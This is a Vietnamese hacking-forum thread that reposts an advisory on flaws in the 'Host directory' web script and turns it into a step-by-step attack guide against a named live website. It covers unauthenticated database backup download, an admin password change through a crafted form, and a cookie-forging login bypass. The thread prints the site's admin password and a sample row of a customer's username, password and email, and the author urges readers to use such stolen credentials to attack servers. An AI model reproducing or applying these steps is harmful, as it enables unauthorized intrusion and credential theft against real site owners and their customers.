banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Khai thác Host directory: Nguy hiểm cao  XML
  [Discussion]   Khai thác Host directory: Nguy hiểm cao 30/12/2006 18:48:29 (+0700) | #1 | 33466
hack2prison
Member

[Minus]    0    [Plus]
Joined: 10/02/2004 10:43:43
Messages: 58
Offline
[Profile] [PM]
Nguồn: http://www.securityfocus.com/archive/1/455352/30/0/threaded

Host directory is a product of scriptsfrenzy.com and alstrasoft.com
I check lastest version and maybe infected lower versions. I contacted
vendor 5 times in 2 months but not received any replies.
- FullPath disclosure: http://site.ext/path/ANY_INCORRECT_LINK
Warning: main(/home/user/public_html/include/ANY_INCORRECT_LINK.php):
failed to open stream: No such file or directory in
/home/user/public_html/include/main.php on line 25
- Backup database bypass: http://site.ext/path/admin/backup/db
- Change admin password without login:
http://site.ext/path/admin/config 


CÁCH KHAI THÁC
I. Lý thuyết có thực hành.
Chú ý: Dùng firefox
Target: WebHost directory một sản phẩm của scriptsfrenzy.com Trước đây H2P làm việc trên trang đó nhưng họ đã off demo nên ta thực hành trên: http://thewebhostdirectory.co.uk
Do ta coi đây như trang demo nên ta đăng nhập vào admin trước nào:
http://thewebhostdirectory.co.uk/admin Password=test

OK vào rồi đấy. Nghía qua các link quan trọng nhất:
Backup DB: http://thewebhostdirectory.co.uk/admin/backup/db
Config: http://thewebhostdirectory.co.uk/admin/config

Do ta đã đăng nhập với tư các admin nên việc thực hiện công việc backup hay config được là lẽ đương nhiên. Ghi nhớ 2 cái link quan trọng cái đã nhé. Logout ra để đảm bảo ta chỉ là một visitor bình thường.

Vào IE gõ lên address: http://thewebhostdirectory.co.uk/admin/backup/db cái gì vậy? Một file .sql đẹp đẹp mời ta download. Hehe, vậy là không check session rồi, không cần đăng nhập admin cũng có quyền download. Cứ download phát đã, để đó và kiểm tra link quan trọng thứ 2:

http://thewebhostdirectory.co.uk/admin/config nó vào trang đăng nhập. Trong trường hợp này ta đã biết pass thì không nói làm gì nhưng nếu một trang chưa biết pass. Có 2 cách:
1. Mở file backup ra: search WebInterfacePassword ta sẽ thấy 'test' nằm bên cạnh, đó là password admin đấy nhưng ta không dùng cách này, không cần biết password là gì có thể config được không? Thử cách 2 nhé:
2. http://thewebhostdirectory.co.uk/admin đăng nhập vào đi.
Nhấn vào link Config. Nhấn chuột phải vào frame chính, chọn View source. Search: <form method="post"> và thay thành: <form action="http://thewebhostdirectory.co.uk/admin/config" method="post">
Save as lại thành file poc.htm Logout ra để bảo đảm ta chỉ là visitor bình thường. Chạy file poc.htm
Tại ô Web Interface Password: nhập vào pass của bạn nhé. VD tớ nhập: vbf
Submit đi. Nó chạy tới trang login nhập pass bạn vừa change vào (vbf)
Hehehe, đăng nhập vô tư rồi đó.

Chú ý: Không nên dùng cách này để change pass của người ta. Nên dùng cách 1 thôi. Nhưng đây là link thực tập nên anh em có thể change. Tuy nhiên sau đó change lại nguyên pass cũ về cho chủ nhân của nó.

Ku có thể sử dụng password trong database backup được để đăng nhập Host CP. Muốn biết user của host thì dùng: http://thewebhostdirectory.co.uk/cai_gi_cung_duoc
Nó Fullpath disclorure rồi: /home/theweb/public_html/include/cai_gi_cung_duoc.php
Vậy user là theweb

II. Tấn công có ý thức dựa vào bug này (nghĩa là không deface anyone)
Do đây là site WebHost Diectory nên khách hàng của site toàn là các chủ sever/reseller nên ta có thể dùng bug này tấn công các server với một sức mạnh kinh hồn.

Mở cái file database backup ở trên ra tìm đến đoạn:
INSERT INTO `hsl_host` (`hid`,`username`,`pwd`,`email`,`name`,`address`.. ..

Đó chính là thông tin của các chủ server/reseller host đấy. VD:
('100','dano1979','afton1981','submission@ajahosti ng.com'...

thì dano1979 là user name | afton1981 là password | submission@ajahosting.com là email. Hãy khai thác các thông tin này để tấn công nhé, còn làm sao thì đừng có hỏi, tớ chửi cho đấy.

Không phá hoại và deface, hãy làm đúng tinh thần: Hacking for security.

ENDED Copyright by Hack2Prison Thanks for helping from VBF leaders.
[Up] [Print Copy]
  [Question]   Khai thác Host directory: Nguy hiểm cao 06/02/2007 15:36:09 (+0700) | #2 | 40267
NHV
Member

[Minus]    0    [Plus]
Joined: 10/01/2007 13:18:05
Messages: 1
Offline
[Profile] [PM]
cach khai thac the hay nhi.nhung khi download cai DB ve thi` chi can search voi ten pass la du roi .. vay la ra pass . ('WebInterfacePassword','hjchjc') vay the la vao pass admin roi.
[Up] [Print Copy]
  [Question]   Re: Khai thác Host directory: Nguy hiểm cao 07/02/2007 05:15:48 (+0700) | #3 | 40377
[Avatar]
lonely_Xorhandsome
Elite Member

[Minus]    0    [Plus]
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
[Profile] [PM]
thnx u so much ! mình thấy cách hack trên chỉ do 50% là lỗi của host directory còn lại 50% lỗi của người chủ host ,với bug trên thì có thể khắc phục dễ dàng cả trên code và host ... mình có coi qua cách login kiểu 2 của bạn nhưng chưa hiểu ý bạn nói trong cách này lắm
2. http://thewebhostdirectory.co.uk/admin đăng nhập vào đi.
Nhấn vào link Config. Nhấn chuột phải vào frame chính, chọn View source. Search: <form method="post"> và thay thành: <form action="http://thewebhostdirectory.co.uk/admin/config" method="post">  

vậy đăng nhập qua account nào ? nếu chưa biết pass và thực tế mình thấy thì khi view source lần đầu đã nhận được cái này
<form method="post"> và thay thành: [b]<form action="http://thewebhostdirectory.co.uk/admin/config" method="post">  
rồi !
mong bạn nói kĩ hơn.
thanks.
[Up] [Print Copy]
  [Question]   Re: Khai thác Host directory: Nguy hiểm cao 09/02/2007 00:21:32 (+0700) | #4 | 40739
theory1
Member

[Minus]    0    [Plus]
Joined: 15/04/2006 14:59:07
Messages: 24
Offline
[Profile] [PM]
có được user va pass nhưng không login được?
[Up] [Print Copy]
  [Question]   Re: Khai thác Host directory: Nguy hiểm cao 09/03/2007 13:20:02 (+0700) | #5 | 45534
kimprinceat
Member

[Minus]    0    [Plus]
Joined: 12/04/2003 07:47:56
Messages: 3
Offline
[Profile] [PM]
Sao lại ko được nhỉ, bạn check lại cái databasa xem. Thân
[Up] [Print Copy]
  [Question]   Re: Khai thác Host directory: Nguy hiểm cao 14/03/2007 00:50:58 (+0700) | #6 | 46409
theory1
Member

[Minus]    0    [Plus]
Joined: 15/04/2006 14:59:07
Messages: 24
Offline
[Profile] [PM]

kimprinceat wrote:
Sao lại ko được nhỉ, bạn check lại cái databasa xem. Thân 

làm ơn print cái màn hình cho tui xem mới.đã thử lại mà không được.cám ơn nhiều
[Up] [Print Copy]
  [Question]   Re: Khai thác Host directory: Nguy hiểm cao 31/03/2007 03:17:23 (+0700) | #7 | 50597
LeGiangLA
Member

[Minus]    0    [Plus]
Joined: 30/03/2007 15:19:30
Messages: 1
Offline
[Profile] [PM]
sao đăng nhập vào không được
[Up] [Print Copy]
  [Question]   Khai thác Host directory: Nguy hiểm cao 31/03/2007 04:26:42 (+0700) | #8 | 50605
[Avatar]
posiden
Member

[Minus]    0    [Plus]
Joined: 02/10/2003 08:57:15
Messages: 84
Location: University of Natural Science - 03CK2
Offline
[Profile] [PM] [Yahoo!]
hì,tại đơn giản có bro nào đó rảnh rỗi đổi pass rùi,các bạn load cái DB về xem đi
[Up] [Print Copy]
  [Question]   Khai thác Host directory: Nguy hiểm cao 31/03/2007 08:39:19 (+0700) | #9 | 50657
dawnblack2
Member

[Minus]    0    [Plus]
Joined: 28/03/2007 11:03:24
Messages: 32
Offline
[Profile] [PM]
vậy bước đầu tiên mà chúng ta ko biết pass của admin ==> sao mà down cái db được
[Up] [Print Copy]
  [Question]   Khai thác Host directory: Nguy hiểm cao 19/04/2007 04:31:53 (+0700) | #10 | 54522
dtcrew
Member

[Minus]    0    [Plus]
Joined: 16/01/2007 13:35:12
Messages: 1
Offline
[Profile] [PM]
Đăng nhập đuợc rồi ! Kha hay thanks !
[Up] [Print Copy]
  [Question]   Khai thác Host directory: Nguy hiểm cao 19/04/2007 08:32:28 (+0700) | #11 | 54548
[Avatar]
nhimthulinh
Member

[Minus]    0    [Plus]
Joined: 14/04/2007 16:23:16
Messages: 19
Offline
[Profile] [PM]
okie, Nhím đã tìm duoc user name and pass rùi, nhưng vẫn ko bik tấn công như thế nào như hack2prison nói đến ở cuối bài, xin trợ giúp của mọi người!!
[Up] [Print Copy]
  [Question]   Khai thác Host directory: Nguy hiểm cao 19/04/2007 10:58:50 (+0700) | #12 | 54578
[Avatar]
huynhvinh
Member

[Minus]    0    [Plus]
Joined: 03/04/2007 17:26:37
Messages: 48
Location: Trong Tim Một Người
Offline
[Profile] [PM]
hay đấy
Pull up your socks!
[Up] [Print Copy]
  [Question]   Khai thác Host directory: Nguy hiểm cao 20/04/2007 09:24:53 (+0700) | #13 | 54748
114v
Member

[Minus]    0    [Plus]
Joined: 08/07/2006 23:27:00
Messages: 191
Offline
[Profile] [PM]
Mới mà có mấy bác VN mình vào tạo user rồi. Script viết quá kém, cái check quyền cơ bản cũng không làm, vậy mà đem đi bán, hay thật!
[Up] [Print Copy]
  [Question]   Re: Khai thác Host directory: Nguy hiểm cao 24/04/2007 03:06:14 (+0700) | #14 | 55390
hightide
Member

[Minus]    0    [Plus]
Joined: 23/04/2007 14:31:42
Messages: 12
Offline
[Profile] [PM]
trang do da doi password la password roi va minh cung da fang nhap vao dc roi cung rat hay nhung saoo file Bakup_db_ minh ko doc dc dung fan mem nao de doc no vay
[Up] [Print Copy]
  [Question]   Khai thác Host directory: Nguy hiểm cao 28/04/2007 11:42:53 (+0700) | #15 | 56143
[Avatar]
hackermientay
Member

[Minus]    0    [Plus]
Joined: 27/06/2006 23:21:20
Messages: 35
Offline
[Profile] [PM]
Dùng notepad xem smilie
[Up] [Print Copy]
  [Question]   Khai thác Host directory: Nguy hiểm cao 02/05/2007 03:00:44 (+0700) | #16 | 56674
[Avatar]
lamhoang20002000
Member

[Minus]    0    [Plus]
Joined: 03/04/2005 16:32:02
Messages: 52
Offline
[Profile] [PM] [Yahoo!]
Không có password mà vẫn download được DB mới gọi là lỗi chứ. File backup thì dùng Notepad xem tốt mà. Mình đã test rồi, có ai đó đã đổi password thành 02101983.
[Up] [Print Copy]
  [Question]   Re: Khai thác Host directory: Nguy hiểm cao 04/05/2007 23:30:24 (+0700) | #17 | 57112
[Avatar]
gamma95
Researcher

Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa&quot;&gt;
Offline
[Profile] [PM] [ICQ]
dùng javascript inline hay hơn nhiều
các bác truy cập vào:
http://thewebhostdirectory.co.uk/admin/login
trên URL gõ
javascript:document.cookie="adm=1";
sau đó bấm nút Back, rồi F5 để refresh
xong smilie)
ps:đọc cả bài thấy khúc này
Không phá hoại và deface, hãy làm đúng tinh thần: Hacking for security.

ENDED Copyright by Hack2Prison Thanks for helping from VBF leaders.
 

bi giờ đi đâu cũng thấy ghi copyleft nhể smilie(
Cánh chym không mỏi
lol
[Up] [Print Copy]
  [Question]   Re: Khai thác Host directory: Nguy hiểm cao 05/05/2007 09:00:23 (+0700) | #18 | 57214
[Avatar]
hackermientay
Member

[Minus]    0    [Plus]
Joined: 27/06/2006 23:21:20
Messages: 35
Offline
[Profile] [PM]

gamma95 wrote:
dùng javascript inline hay hơn nhiều
các bác truy cập vào:
http://thewebhostdirectory.co.uk/admin/login
trên URL gõ
javascript:document.cookie="adm=1";
sau đó bấm nút Back, rồi F5 để refresh
xong smilie)
 

Dựa vào đâu mà Gamma95 biết chọn adm=1 vậy smilie
[Up] [Print Copy]
  [Question]   Khai thác Host directory: Nguy hiểm cao 05/05/2007 09:04:32 (+0700) | #19 | 57215
[Avatar]
hackermientay
Member

[Minus]    0    [Plus]
Joined: 27/06/2006 23:21:20
Messages: 35
Offline
[Profile] [PM]
À, tui hiểu rùi smilie
[Up] [Print Copy]
  [Question]   Khai thác Host directory: Nguy hiểm cao 05/05/2007 12:52:22 (+0700) | #20 | 57257
[Avatar]
gamma95
Researcher

Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa&quot;&gt;
Offline
[Profile] [PM] [ICQ]
hiểu sao nói nghe coai, nói thiệt là tui cũng chưa hiểu smilie?
Cánh chym không mỏi
lol
[Up] [Print Copy]
  [Question]   Khai thác Host directory: Nguy hiểm cao 06/05/2007 08:51:42 (+0700) | #21 | 57406
[Avatar]
lamhoang20002000
Member

[Minus]    0    [Plus]
Joined: 03/04/2005 16:32:02
Messages: 52
Offline
[Profile] [PM] [Yahoo!]
Chà, gamma95 tìm ra cách hay nhỉ. Mong giải thích cho mọi người hiểu với.
[Up] [Print Copy]
  [Question]   Re: Khai thác Host directory: Nguy hiểm cao 07/07/2007 06:26:38 (+0700) | #22 | 69465
OriTiger
Member

[Minus]    0    [Plus]
Joined: 06/07/2007 18:00:23
Messages: 1
Offline
[Profile] [PM]

hightide wrote:
trang do da doi password la password roi va minh cung da fang nhap vao dc roi cung rat hay nhung saoo file Bakup_db_ minh ko doc dc dung fan mem nao de doc no vay
 


Giải nén với Winrar vì file đã nén dạng .gz smilie-))
[Up] [Print Copy]
  [Question]   Khai thác Host directory: Nguy hiểm cao 07/07/2007 13:31:35 (+0700) | #23 | 69579
[Avatar]
rickb
Reseacher

Joined: 27/01/2007 17:47:27
Messages: 200
Offline
[Profile] [PM] [Yahoo!]

hack2prison wrote:
Nguồn: http://www.securityfocus.com/archive/1/455352/30/0/threaded

Host directory is a product of scriptsfrenzy.com and alstrasoft.com
I check lastest version and maybe infected lower versions. I contacted
vendor 5 times in 2 months but not received any replies.
- FullPath disclosure: http://site.ext/path/ANY_INCORRECT_LINK
Warning: main(/home/user/public_html/include/ANY_INCORRECT_LINK.php):
failed to open stream: No such file or directory in
/home/user/public_html/include/main.php on line 25
- Backup database bypass: http://site.ext/path/admin/backup/db
- Change admin password without login:
http://site.ext/path/admin/config 


CÁCH KHAI THÁC
I. Lý thuyết có thực hành.
Chú ý: Dùng firefox
Target: WebHost directory một sản phẩm của scriptsfrenzy.com Trước đây H2P làm việc trên trang đó nhưng họ đã off demo nên ta thực hành trên: http://thewebhostdirectory.co.uk
Do ta coi đây như trang demo nên ta đăng nhập vào admin trước nào:
http://thewebhostdirectory.co.uk/admin Password=test

OK vào rồi đấy. Nghía qua các link quan trọng nhất:
Backup DB: http://thewebhostdirectory.co.uk/admin/backup/db
Config: http://thewebhostdirectory.co.uk/admin/config

Do ta đã đăng nhập với tư các admin nên việc thực hiện công việc backup hay config được là lẽ đương nhiên. Ghi nhớ 2 cái link quan trọng cái đã nhé. Logout ra để đảm bảo ta chỉ là một visitor bình thường.

Vào IE gõ lên address: http://thewebhostdirectory.co.uk/admin/backup/db cái gì vậy? Một file .sql đẹp đẹp mời ta download. Hehe, vậy là không check session rồi, không cần đăng nhập admin cũng có quyền download. Cứ download phát đã, để đó và kiểm tra link quan trọng thứ 2:

http://thewebhostdirectory.co.uk/admin/config nó vào trang đăng nhập. Trong trường hợp này ta đã biết pass thì không nói làm gì nhưng nếu một trang chưa biết pass. Có 2 cách:
1. Mở file backup ra: search WebInterfacePassword ta sẽ thấy 'test' nằm bên cạnh, đó là password admin đấy nhưng ta không dùng cách này, không cần biết password là gì có thể config được không? Thử cách 2 nhé:
2. http://thewebhostdirectory.co.uk/admin đăng nhập vào đi.
Nhấn vào link Config. Nhấn chuột phải vào frame chính, chọn View source. Search: <form method="post"> và thay thành: <form action="http://thewebhostdirectory.co.uk/admin/config" method="post">
Save as lại thành file poc.htm Logout ra để bảo đảm ta chỉ là visitor bình thường. Chạy file poc.htm
Tại ô Web Interface Password: nhập vào pass của bạn nhé. VD tớ nhập: vbf
Submit đi. Nó chạy tới trang login nhập pass bạn vừa change vào (vbf)
Hehehe, đăng nhập vô tư rồi đó.

Chú ý: Không nên dùng cách này để change pass của người ta. Nên dùng cách 1 thôi. Nhưng đây là link thực tập nên anh em có thể change. Tuy nhiên sau đó change lại nguyên pass cũ về cho chủ nhân của nó.

Ku có thể sử dụng password trong database backup được để đăng nhập Host CP. Muốn biết user của host thì dùng: http://thewebhostdirectory.co.uk/cai_gi_cung_duoc
Nó Fullpath disclorure rồi: /home/theweb/public_html/include/cai_gi_cung_duoc.php
Vậy user là theweb

II. Tấn công có ý thức dựa vào bug này (nghĩa là không deface anyone)
Do đây là site WebHost Diectory nên khách hàng của site toàn là các chủ sever/reseller nên ta có thể dùng bug này tấn công các server với một sức mạnh kinh hồn.

Mở cái file database backup ở trên ra tìm đến đoạn:
INSERT INTO `hsl_host` (`hid`,`username`,`pwd`,`email`,`name`,`address`.. ..

Đó chính là thông tin của các chủ server/reseller host đấy. VD:
('100','dano1979','afton1981','submission@ajahosti ng.com'...

thì dano1979 là user name | afton1981 là password | submission@ajahosting.com là email. Hãy khai thác các thông tin này để tấn công nhé, còn làm sao thì đừng có hỏi, tớ chửi cho đấy.

Không phá hoại và deface, hãy làm đúng tinh thần: Hacking for security.

ENDED Copyright by Hack2Prison Thanks for helping from VBF leaders. 


Tôi có 1 thắc mắc, đã login vào được phần http://thewebhostdirectory.co.uk/admin (dùng pass test của bác hoặc cách Javascript Inline của Gama) rồi thì sao ko backup thẳng luôn mà phải log out ra rồi tận dụng lỗi website ko check session kỹ để backup database ? Nó đâu có gì khác nhau ?

Thứ 2 là tại sao đổi Code:
<form method="post">
thành: Code:
<form action="http://thewebhostdirectory.co.uk/admin/config" method="post">
thì ta lại có thể login với bất kỳ pass nào mình đưa vào (vd ở trên là vbf) ?
[Up] [Print Copy]
  [Question]   Khai thác Host directory: Nguy hiểm cao 11/07/2007 01:47:57 (+0700) | #24 | 70330
[Avatar]
kid_b0d
Member

[Minus]    0    [Plus]
Joined: 16/08/2006 00:49:55
Messages: 70
Location: Phan thiết, Bình thu
Offline
[Profile] [PM] [WWW]
Tôi xin trả lời câu hỏi thứ 1 của bạn:
Tôi có 1 thắc mắc, đã login vào được phần http://thewebhostdirectory.co.uk/admin (dùng pass test của bác hoặc cách Javascript Inline của Gama) rồi thì sao ko backup thẳng luôn mà phải log out ra rồi tận dụng lỗi website ko check session kỹ để backup database ? Nó đâu có gì khác nhau ?
 


Vấn đề đặt ra ở đây là :learn to hack chứ không hack to learn , vì vậy nên bước đầu login vào để cho chúng ta quan sát rõ cấu trúc bên trong 1 cách trực quan hơn về các bugs của source này. sau đó login ra với tư cách là 1 visitor , tức là 1 người bình thường , với tư cách guest . sau đó mới actack thông qua những gì bạn đã quan sát được và đương nhiên lần sau nếu gặp thì thực hiện actack luôn chứ hơi đâu mà vào quan sát nữa.

Câu thứ 2:
Khi thực hiện phương thức Post từ Client thì chúng ta sẽ đưa vào 1 Action (Sự kiện) để nó thực thi dòng lệnh khi nhận được từ phía server. giống như khi ra gửi Boom thì cần phải có Address destination chứ smilie .
và vì sao có thể login với passwd là VBF thì bạn nên xem lại cái code trên . nó sẽ thực thi 1 dòng lệnh trong đó cho phép change passwd của admin mà không cần phải khai báo passwd cũ (bugs) . Như vậy là ta có thể hiểu được vì sao ta có thể tấn công nó 1 cách dễ dàng như vậy.
[Up] [Print Copy]
  [Question]   Khai thác Host directory: Nguy hiểm cao 15/07/2007 07:09:40 (+0700) | #25 | 71253
hoanglinh_nb
Member

[Minus]    0    [Plus]
Joined: 23/04/2007 16:40:47
Messages: 14
Offline
[Profile] [PM]
mọi người cho hỏi cái lỗi này tìm thế nào,nghĩa là tìm những site có lỗi này thế nào.Hay là chỉ có mỗi cái site trên cho thực hành thôi.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|